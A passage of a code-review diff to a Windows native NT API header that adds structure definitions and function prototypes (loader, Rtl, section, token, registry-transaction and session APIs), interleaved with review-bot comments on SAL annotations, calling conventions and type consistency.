@@ -5299,6 +5422,7 @@ typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION { PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy; PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy; PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy; + PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy; }; } PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION; 
@@ -5589,9 +5713,82 @@ typedef struct _ESERVERSILO_GLOBALS { ** SILO END */ +/* +** SOFTWARE LICENSING START +*/ +#pragma pack(push, 1) +typedef struct _SL_CACHE_VALUE_DESCRIPTOR { + USHORT Size; + USHORT NameLength; + USHORT Type; + USHORT DataLength; + ULONG Attributes; + ULONG Reserved; + WCHAR Name[ANYSIZE_ARRAY]; +} SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR; +typedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR; +#pragma pack(pop) + +typedef struct _SL_CACHE { + ULONG TotalSize; + ULONG SizeOfData; + ULONG SignatureSize; + ULONG Flags; + ULONG Version; + SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY]; +} SL_CACHE, *PSL_CACHE; +typedef SL_CACHE SL_KMEM_CACHE; + +typedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR { + UCHAR HashedName[32]; + ULONGLONG Expiration; + ULONG DataSize; + WCHAR Name[ANYSIZE_ARRAY]; +} SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR; + +typedef struct _SL_APPX_CACHE { + ULONG Version; + ULONG Flags; + ULONG DataSize; + ULONGLONG DataCheckSum; + SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY]; +} SL_APPX_CACHE, *PSL_APPX_CACHE; + + +/* +** SOFTWARE LICENSING END +*/ + + /* ** LDR START */ +// +// Dll Characteristics for LdrLoadDll +// +#define LDR_IGNORE_CODE_AUTHZ_LEVEL 0x00001000 + +// +// LdrAddRef Flags +// +#define LDR_ADDREF_DLL_PIN 0x00000001 + +// +// LdrLockLoaderLock Flags +// +#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 +#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002 + +// +// LdrUnlockLoaderLock Flags +// +#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 + +// +// LdrGetDllHandleEx Flags +// +#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001 +#define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002 typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 
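Review bot: `SL_CACHE` and `SL_APPX_CACHE` are variable-length blobs in which every descriptor's extent (`Size`, `NameLength`, `DataLength`, `DataSize`) comes from the data itself, and nothing in the hunk records how a reader is expected to advance through `Descriptors` or validate those lengths against `TotalSize`. Where this blob originates is not visible here; if it is read from the registry or a file, a consumer that trusts `Size` can walk past the end of the allocation. A header comment on `SL_CACHE_VALUE_DESCRIPTOR` stating the invariants a reader must verify before dereferencing `Name` or the trailing data (presumably that each `Size` covers the fixed header plus `NameLength` plus `DataLength`, and that the running offset stays below `TotalSize`) would make that obligation explicit. The `#pragma pack(push, 1)` covers only the descriptor while `SL_CACHE` itself keeps default packing; a note confirming that is intentional for the on-disk layout would save the next maintainer from "fixing" it.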
@@ -5804,6 +6001,12 @@ LdrQueryImageFileExecutionOptions( _In_ ULONG BufferSize, _Out_opt_ PULONG ResultSize); +NTSYSAPI +BOOLEAN +NTAPI +LdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected + _In_ PVOID DllHandle); + NTSYSAPI NTSTATUS NTAPI @@ -5961,6 +6164,9 @@ CsrClientConnectToServer( * ************************************************************************************/ +#define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001) +#define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002) + #ifndef RtlInitEmptyUnicodeString #define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \ ((_ucStr)->Buffer = (_buf), \ @@ -6114,6 +6320,14 @@ RtlAnsiStringToUnicodeString( _In_ PCANSI_STRING SourceString, _In_ BOOLEAN AllocateDestinationString); +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToAnsiString( + _Inout_ PANSI_STRING DestinationString, + _In_ PUNICODE_STRING SourceString, + _In_ BOOLEAN AllocateDestinationString); + NTSYSAPI WCHAR NTAPI @@ -6137,13 +6351,6 @@ RtlDosPathNameToNtPathName_U( _Out_opt_ PWSTR *FilePart, _Reserved_ PVOID Reserved); -NTSYSAPI -PWSTR -NTAPI -RtlIpv4AddressToStringW( - _In_ const struct in_addr *Addr, - _Out_ PWSTR S); - NTSYSAPI LONG NTAPI 
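Review bot: `RtlUnicodeStringToAnsiString` declares its source as `_In_ PUNICODE_STRING SourceString`, whereas the sibling `RtlAnsiStringToUnicodeString` shown in the same context takes `_In_ PCANSI_STRING`; the `_In_` annotation already promises the string is not modified, so `_In_ PCUNICODE_STRING SourceString` is the consistent form and lets callers pass a const string without a cast. `PCUNICODE_STRING` is already typedef'd earlier in this header, so no other change is needed.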
@@ -6340,29 +6547,104 @@ RtlpEnsureBufferSize( } \ } while (0) + /************************************************************************************ * -* RTL Process/Thread API. +* RTL Integer conversion API. * ************************************************************************************/ -typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)( - PRTL_USER_PROCESS_PARAMETERS ProcessParameters - ); +NTSYSAPI +PWSTR +NTAPI +RtlIpv4AddressToStringW( + _In_ const struct in_addr *Addr, + _Out_ PWSTR S); -typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)( - PVOID ThreadParameter - ); +NTSYSAPI +NTSTATUS +NTAPI +RtlIpv4StringToAddressW( + _In_ PCWSTR AddressString, + _In_ BOOLEAN Strict, + _Out_ LPCWSTR *Terminator, + _Out_ struct in_addr *Address); -typedef struct _RTL_USER_PROCESS_INFORMATION { - ULONG Length; - HANDLE Process; - HANDLE Thread; - CLIENT_ID ClientId; - SECTION_IMAGE_INFORMATION ImageInformation; -} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; +//taken from ph2 -// +NTSYSAPI +NTSTATUS +NTAPI +RtlIntegerToChar( + _In_ ULONG Value, + _In_opt_ ULONG Base, + _In_ LONG OutputLength, + _Out_ PSTR String); + +NTSYSAPI +NTSTATUS +NTAPI +RtlCharToInteger( + _In_ PSTR String, + _In_opt_ ULONG Base, + _Out_ PULONG Value); + +NTSYSAPI +NTSTATUS +NTAPI +RtlLargeIntegerToChar( + _In_ PLARGE_INTEGER Value, + _In_opt_ ULONG Base, + _In_ LONG OutputLength, + _Out_ PSTR String); + +NTSYSAPI +NTSTATUS +NTAPI +RtlIntegerToUnicodeString( + _In_ ULONG Value, + _In_opt_ ULONG Base, + _Inout_ PUNICODE_STRING String); + +NTSYSAPI +NTSTATUS +NTAPI +RtlInt64ToUnicodeString( + _In_ ULONGLONG Value, + _In_opt_ ULONG Base, + _Inout_ PUNICODE_STRING String); + +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToInteger( + _In_ PUNICODE_STRING String, + _In_opt_ ULONG Base, + _Out_ PULONG Value); + +/************************************************************************************ +* +* RTL Process/Thread API. 
+* +************************************************************************************/ + +typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)( + PRTL_USER_PROCESS_PARAMETERS ProcessParameters + ); + +typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)( + PVOID ThreadParameter + ); + +typedef struct _RTL_USER_PROCESS_INFORMATION { + ULONG Length; + HANDLE Process; + HANDLE Thread; + CLIENT_ID ClientId; + SECTION_IMAGE_INFORMATION ImageInformation; +} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; + +// // This structure is used only by Wow64 processes. The offsets // of structure elements should the same as viewed by a native Win64 application. // @@ -7059,7 +7341,10 @@ RtlCopySecurityDescriptor( _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor, _Out_ PSECURITY_DESCRIPTOR *OutputSecurityDescriptor); -FORCEINLINE LUID NTAPI RtlConvertLongToLuid( +FORCEINLINE +LUID +NTAPI +RtlConvertLongToLuid( _In_ LONG Long ) { @@ -7072,6 +7357,20 @@ FORCEINLINE LUID NTAPI RtlConvertLongToLuid( return(TempLuid); } +FORCEINLINE +LUID +RtlConvertUlongToLuid( + _In_ ULONG Ulong +) +{ + LUID tempLuid; + + tempLuid.LowPart = Ulong; + tempLuid.HighPart = 0; + + return tempLuid; +} + NTSYSAPI ULONG NTAPI @@ -7439,6 +7738,21 @@ RtlImageRvaToVa( _In_ ULONG Rva, _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection); +NTSYSAPI +PVOID +NTAPI +RtlFindExportedRoutineByName( + _In_ PVOID BaseOfImage, + _In_ PSTR RoutineName); + +NTSYSAPI +NTSTATUS +NTAPI +RtlGuardCheckLongJumpTarget( + _In_ PVOID PcValue, + _In_ BOOL IsFastFail, + _Out_ PBOOL IsLongJumpTarget); + /************************************************************************************ * * RTL Time API. @@ -7452,6 +7766,14 @@ RtlSecondsSince1970ToTime( _In_ ULONG ElapsedSeconds, _Out_ PLARGE_INTEGER Time); +NTSYSAPI +BOOLEAN +NTAPI +RtlTimeToSecondsSince1970( + _In_ PLARGE_INTEGER Time, + _Out_ PULONG ElapsedSeconds); + + NTSYSAPI VOID NTAPI 
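Review bot: The new section header reads `RTL Integer conversion API`, but the first two declarations placed under it — `RtlIpv4AddressToStringW`, moved here from the string section, and the new `RtlIpv4StringToAddressW` — convert network addresses, not integers; either leave them in the previous section or widen the header, e.g. `RTL Integer / IPv4 address conversion API`. `RtlCharToInteger` takes `_In_ PSTR String` for input it only reads; `_In_ PCSTR String,` would match the `_In_ PCWSTR AddressString` two declarations above. The `//taken from ph2` marker names a project but not a header; naming the file makes the copy verifiable. This hunk begins on the previous line; the moved `RTL Process/Thread API` block ends unchanged past its last added line.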
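Review bot: `RtlConvertUlongToLuid` is declared `FORCEINLINE LUID RtlConvertUlongToLuid(` without the `NTAPI` that its sibling `RtlConvertLongToLuid`, reformatted in the hunk just above, carries; `FORCEINLINE LUID NTAPI RtlConvertUlongToLuid(` keeps the pair consistent (harmless for an inline function, but the file spells the convention everywhere else). The local `tempLuid` also departs from the sibling's `TempLuid` casing.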
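Review bot: `RtlFindExportedRoutineByName` takes `_In_ PSTR RoutineName` for a name it only reads; `_In_ PCSTR RoutineName,` avoids forcing callers to cast string literals. `RtlGuardCheckLongJumpTarget` uses Win32 `BOOL`/`PBOOL` in a header whose native prototypes otherwise use `BOOLEAN`; if that mirrors the exported prototype, a short trailer saying so will stop a later "fix" from narrowing the argument.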
@@ -7480,6 +7802,20 @@ RtlTimeFieldsToTime( _In_ PTIME_FIELDS TimeFields, _Out_ PLARGE_INTEGER Time); +NTSYSAPI +NTSTATUS +NTAPI +RtlSystemTimeToLocalTime( + _In_ PLARGE_INTEGER SystemTime, + _Out_ PLARGE_INTEGER LocalTime); + +NTSYSAPI +NTSTATUS +NTAPI +RtlLocalTimeToSystemTime( + _In_ PLARGE_INTEGER LocalTime, + _Out_ PLARGE_INTEGER SystemTime); + /************************************************************************************ * * RTL Debug Support API. @@ -7493,6 +7829,15 @@ DbgPrint( _In_z_ _Printf_format_string_ PCH Format, ...); +NTSYSAPI +ULONG +STDAPIVCALLTYPE +DbgPrintEx( + _In_ ULONG ComponentId, + _In_ ULONG Level, + _In_z_ _Printf_format_string_ PSTR Format, + ...); + NTSYSAPI NTSTATUS NTAPI @@ -7895,6 +8240,18 @@ NTAPI RtlDoesFileExists_U( _In_ PCWSTR FileName); +NTSYSAPI +ULONG +NTAPI +RtlGetLongestNtPathLength( + VOID); + +NTSYSAPI +BOOLEAN +NTAPI +RtlAreLongPathsEnabled( + VOID); + /************************************************************************************ * * RTL Boundary Descriptor API. 
@@ -8633,6 +8990,41 @@ NtDeletePrivateNamespace( * ************************************************************************************/ +typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1 + LARGE_INTEGER CreationTime; + UNICODE_STRING LinkTarget; + ULONG DosDeviceDriveIndex; +} OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1; + +typedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2 + LARGE_INTEGER CreationTime; + UNICODE_STRING LinkTarget; + ULONG DosDeviceDriveIndex; + ULONG Flags; +} OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2; + +typedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1 + LARGE_INTEGER CreationTime; + UNICODE_STRING LinkTarget; + ULONG DosDeviceDriveIndex; + ULONG Flags; + ULONG AccessMask; +} OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3; + +typedef struct _OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+ + LARGE_INTEGER CreationTime; + union { + UNICODE_STRING LinkTarget; + struct { + PVOID Callback; + PVOID CallbackContext; + }; + } u1; + ULONG DosDeviceDriveIndex; + ULONG Flags; + ULONG AccessMask; +} OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4; + NTSYSAPI NTSTATUS NTAPI @@ -8712,7 +9104,7 @@ NtCreateMailslotFile( _In_ ULONG MaximumMessageSize, _In_ PLARGE_INTEGER ReadTimeout); -NTSYSCALLAPI +NTSYSAPI NTSTATUS NTAPI NtDeviceIoControlFile( @@ -8862,6 +9254,21 @@ NtQueryDirectoryFile( _In_opt_ PUNICODE_STRING FileName, _In_ BOOLEAN RestartScan); +NTSYSCALLAPI +NTSTATUS +NTAPI +NtQueryDirectoryFileEx( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass, + _In_ ULONG QueryFlags, + _In_opt_ PUNICODE_STRING FileName); + NTSYSAPI NTSTATUS NTAPI @@ -8984,7 +9391,8 @@ NtLoadDriver( NTSYSAPI NTSTATUS -NTAPI NtUnloadDriver( +NTAPI +NtUnloadDriver( _In_ PUNICODE_STRING DriverServiceName); NTSYSAPI 
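Review bot: `OBJECT_SYMBOLIC_LINK_V4` overlays `LinkTarget` with `Callback`/`CallbackContext` in union `u1`, but nothing says which `Flags` value selects the callback form, so a reader can dereference `u1.LinkTarget` as a `UNICODE_STRING` on a callback link. A comment on the union such as `// u1 holds Callback/CallbackContext instead of LinkTarget when Flags marks a callback link — confirm the flag value` would prevent that. The OS-version trailers (`//pre Win10 TH1`, `//Win10 RS1`, ...) are the right idea; the V3 `AccessMask` and V2 `Flags` additions would benefit from the same one-line treatment.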
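Review bot: `NtQueryDirectoryFileEx` is declared with `NTSYSCALLAPI`, while the hunk immediately before it on this line changes `NtDeviceIoControlFile` from `NTSYSCALLAPI` to `NTSYSAPI` and every other new Nt* prototype in this diff uses `NTSYSAPI`; use `NTSYSAPI` here too. Its `_Out_ PVOID FileInformation` buffer is sized by `Length`, so `_Out_writes_bytes_(Length) PVOID FileInformation,` follows the annotation style applied to `NtQuerySection` later in this diff. `QueryFlags` has no trailer naming the accepted values, unlike `CreateFlags` on `NtCreateThreadEx` below; add one (I cannot verify the flag set from here).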
@@ -9000,6 +9408,14 @@ NtLoadHotPatch( * ************************************************************************************/ +#define MEM_EXECUTE_OPTION_DISABLE 0x1 +#define MEM_EXECUTE_OPTION_ENABLE 0x2 +#define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4 +#define MEM_EXECUTE_OPTION_PERMANENT 0x8 +#define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10 +#define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20 +#define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f + typedef enum _MEMORY_PARTITION_INFORMATION_CLASS { SystemMemoryPartitionInformation, SystemMemoryPartitionMoveMemory, @@ -9069,6 +9485,21 @@ NtCreateSection( _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle); +//taken from ph2 +NTSYSAPI +NTSTATUS +NTAPI +NtCreateSectionEx( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PLARGE_INTEGER MaximumSize, + _In_ ULONG SectionPageProtection, + _In_ ULONG AllocationAttributes, + _In_opt_ HANDLE FileHandle, + _In_ PMEM_EXTENDED_PARAMETER ExtendedParameters, + _In_ ULONG ExtendedParameterCount); + NTSYSAPI NTSTATUS NTAPI @@ -9083,7 +9514,7 @@ NTAPI NtMapViewOfSection( _In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle, - _Inout_ PVOID *BaseAddress, + _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize, _Inout_opt_ PLARGE_INTEGER SectionOffset, @@ -9092,22 +9523,12 @@ NtMapViewOfSection( _In_ ULONG AllocationType, _In_ ULONG Win32Protect); -NTSYSAPI -NTSTATUS -NTAPI -NtQuerySection( - _In_ HANDLE SectionHandle, - _In_ SECTION_INFORMATION_CLASS SectionInformationClass, - _Out_ PVOID SectionInformation, - _In_ SIZE_T SectionInformationLength, - _Out_opt_ PSIZE_T ReturnLength); - NTSYSAPI NTSTATUS NTAPI NtUnmapViewOfSection( _In_ HANDLE ProcessHandle, - _In_ PVOID BaseAddress); + _In_opt_ PVOID BaseAddress); NTSYSAPI NTSTATUS 
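Review bot: The `MEM_EXECUTE_OPTION_*` defines land in the memory section without saying what they apply to; they are the bit values of the process execute-flags (DEP) setting, and a header comment such as `// ProcessExecuteFlags bits (NtQuery/SetInformationProcess)` would tell readers where they are used. `MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f` is the OR of the six bits above it; writing it as that OR expression, as `TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS` is written later in this diff, makes the mask self-checking when a bit is added.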
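Review bot: `NtCreateSectionEx` annotates its extended-parameter array as `_In_ PMEM_EXTENDED_PARAMETER ExtendedParameters` without tying it to `ExtendedParameterCount`, so SAL cannot check the length; `_In_reads_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,` follows the `_In_reads_(*NumberOfPages)` form already used on `NtFreeUserPhysicalPages` (drop the `_opt_` if a NULL array with count 0 is not accepted — I cannot tell from here). The `//taken from ph2` marker would be more useful naming the source header.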
@@ -9117,6 +9538,16 @@ NtUnmapViewOfSectionEx( _In_opt_ PVOID BaseAddress, _In_ ULONG Flags); +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySection( + _In_ HANDLE SectionHandle, + _In_ SECTION_INFORMATION_CLASS SectionInformationClass, + _Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation, + _In_ SIZE_T SectionInformationLength, + _Out_opt_ PSIZE_T ReturnLength); + NTSYSAPI NTSTATUS NTAPI @@ -9156,6 +9587,13 @@ NtFreeUserPhysicalPages( _Inout_ PULONG_PTR NumberOfPages, _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray); +NTSYSAPI +NTSTATUS +NTAPI +NtAreMappedFilesTheSame( + _In_ PVOID File1MappedAsAnImage, + _In_ PVOID File2MappedAsFile); + NTSYSAPI NTSTATUS NTAPI 
@@ -9188,6 +9626,87 @@ NtCreatePartition( * Token API. * ************************************************************************************/ +// +// This part is taken from PH ntseapi.h. +// + +// Types + +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06 +#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10 + +// Flags + +#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001 +#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002 +#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004 +#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008 +#define TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010 +#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020 +#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040 + +#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \ + TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \ + TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \ + TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \ + TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \ + TOKEN_SECURITY_ATTRIBUTE_DISABLED | \ + TOKEN_SECURITY_ATTRIBUTE_MANDATORY) + +#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000 + +typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE +{ + ULONG64 Version; + UNICODE_STRING Name; +} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE; + +typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE +{ + PVOID pValue; + ULONG ValueLength; +} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE; + +typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1 +{ + UNICODE_STRING Name; + USHORT ValueType; + USHORT Reserved; + ULONG Flags; + ULONG ValueCount; + union + { + PLONG64 pInt64; + PULONG64 pUint64; + 
PUNICODE_STRING pString; + PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn; + PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString; + } Values; +} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1; + +#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1 +#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 + +typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION +{ + USHORT Version; + USHORT Reserved; + ULONG AttributeCount; + union + { + PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1; + } Attribute; +} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION; + +// +// endof ntseapi.h +// NTSYSAPI NTSTATUS @@ -9234,6 +9753,39 @@ NtAccessCheckByTypeResultList( _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess, _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus); +NTSYSAPI +NTSTATUS +NTAPI +NtOpenObjectAuditAlarm( + _In_ PUNICODE_STRING SubsystemName, + _In_opt_ PVOID HandleId, + _In_ PUNICODE_STRING ObjectTypeName, + _In_ PUNICODE_STRING ObjectName, + _In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _In_ HANDLE ClientToken, + _In_ ACCESS_MASK DesiredAccess, + _In_ ACCESS_MASK GrantedAccess, + _In_opt_ PPRIVILEGE_SET Privileges, + _In_ BOOLEAN ObjectCreation, + _In_ BOOLEAN AccessGranted, + _Out_ PBOOLEAN GenerateOnClose); + +NTSYSAPI +NTSTATUS +NTAPI +NtCloseObjectAuditAlarm( + _In_ PUNICODE_STRING SubsystemName, + _In_opt_ PVOID HandleId, + _In_ BOOLEAN GenerateOnClose); + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteObjectAuditAlarm( + _In_ PUNICODE_STRING SubsystemName, + _In_opt_ PVOID HandleId, + _In_ BOOLEAN GenerateOnClose); + NTSYSAPI NTSTATUS NTAPI @@ -9331,7 +9883,7 @@ NtAdjustPrivilegesToken( _In_opt_ PTOKEN_PRIVILEGES NewState, _In_ ULONG BufferLength, _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState, - _Out_ _When_(PreviousState == NULL, _Out_opt_) PULONG ReturnLength); + _Out_opt_ PULONG ReturnLength); NTSYSAPI NTSTATUS 
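Review bot: `TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE` (0x0040) is defined but left out of `TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS`, so a caller that validates a mask built from the listed flags against VALID_FLAGS will reject it; if this mirrors the header it was copied from, a trailer `// COMPARE_IGNORE intentionally not part of VALID_FLAGS` keeps someone from "fixing" it. The `pValue`/`pInt64`/`pString` Hungarian names differ from the rest of this header but presumably keep parity with the source layout; saying so in the `// This part is taken from PH ntseapi.h.` banner avoids a cosmetic rename that would break copy-paste comparisons. This hunk begins on the previous line.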
@@ -9342,7 +9894,7 @@ NtAdjustGroupsToken( _In_opt_ PTOKEN_GROUPS NewState, _In_opt_ ULONG BufferLength, _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState, - _Out_ PULONG ReturnLength); + _Out_opt_ PULONG ReturnLength); NTSYSAPI NTSTATUS @@ -9671,6 +10223,38 @@ NTAPI NtLockRegistryKey( _In_ HANDLE KeyHandle); +NTSYSAPI +NTSTATUS +NTAPI +NtCreateRegistryTransaction( + _Out_ PHANDLE Handle, + _In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_* + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ DWORD Flags); + +NTSYSAPI +NTSTATUS +NTAPI +NtCommitRegistryTransaction( + _In_ HANDLE RegistryHandle, + _In_ BOOL Wait); + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenRegistryTransaction( + _Out_ PHANDLE RegistryHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes); + +NTSYSAPI +NTSTATUS +NTAPI +NtRollbackRegistryTransaction( + _In_ HANDLE RegistryHandle, + _In_ BOOL Wait); + + /************************************************************************************ * * Job API. 
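Review bot: The registry-transaction prototypes mix Win32 types into a native header: `_In_ DWORD Flags` on `NtCreateRegistryTransaction` and `_In_ BOOL Wait` on `NtCommitRegistryTransaction`/`NtRollbackRegistryTransaction`, whereas the surrounding Nt* declarations use `ULONG`/`BOOLEAN`. `BOOL` is a 4-byte int and `BOOLEAN` a single byte, so this is not purely cosmetic — if the native routine really takes a 4-byte `Wait`, keep `BOOL` and say so in a comment; otherwise `_In_ BOOLEAN Wait);` matches the file. The `//generic + TRANSACTION_*` trailer on `DesiredAccess` is good; `Flags` deserves the same naming of its accepted values (I cannot verify them from here).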
@@ -9747,14 +10331,52 @@ NtTerminateJobObject( * ************************************************************************************/ +//taken from ph2 + +typedef enum _IO_SESSION_EVENT { + IoSessionEventIgnore, + IoSessionEventCreated, + IoSessionEventTerminated, + IoSessionEventConnected, + IoSessionEventDisconnected, + IoSessionEventLogon, + IoSessionEventLogoff, + IoSessionEventMax +} IO_SESSION_EVENT; + +typedef enum _IO_SESSION_STATE { + IoSessionStateCreated, + IoSessionStateInitialized, + IoSessionStateConnected, + IoSessionStateDisconnected, + IoSessionStateDisconnectedLoggedOn, + IoSessionStateLoggedOn, + IoSessionStateLoggedOff, + IoSessionStateTerminated, + IoSessionStateMax +} IO_SESSION_STATE; + NTSYSAPI -NTSTATUS -NTAPI +NTSTATUS +NTAPI NtOpenSession( _Out_ PHANDLE SessionHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes); +NTSYSAPI +NTSTATUS +NTAPI +NtNotifyChangeSession( + _In_ HANDLE SessionHandle, + _In_ ULONG ChangeSequenceNumber, + _In_ PLARGE_INTEGER ChangeTimeStamp, + _In_ IO_SESSION_EVENT Event, + _In_ IO_SESSION_STATE NewState, + _In_ IO_SESSION_STATE PreviousState, + _In_reads_bytes_opt_(PayloadSize) PVOID Payload, + _In_ ULONG PayloadSize); + /************************************************************************************ * * IO Completion API. @@ -10134,6 +10756,13 @@ NTAPI NtTestAlert( VOID); +NTSYSAPI +NTSTATUS +NTAPI +NtDelayExecution( + _In_ BOOLEAN Alertable, + _In_opt_ PLARGE_INTEGER DelayInterval); + NTSYSAPI NTSTATUS NTAPI 
@@ -10152,17 +10781,17 @@ NTSYSAPI
 NTSTATUS
 NTAPI
 NtCreateThreadEx(
- _Out_ PHANDLE hThread,
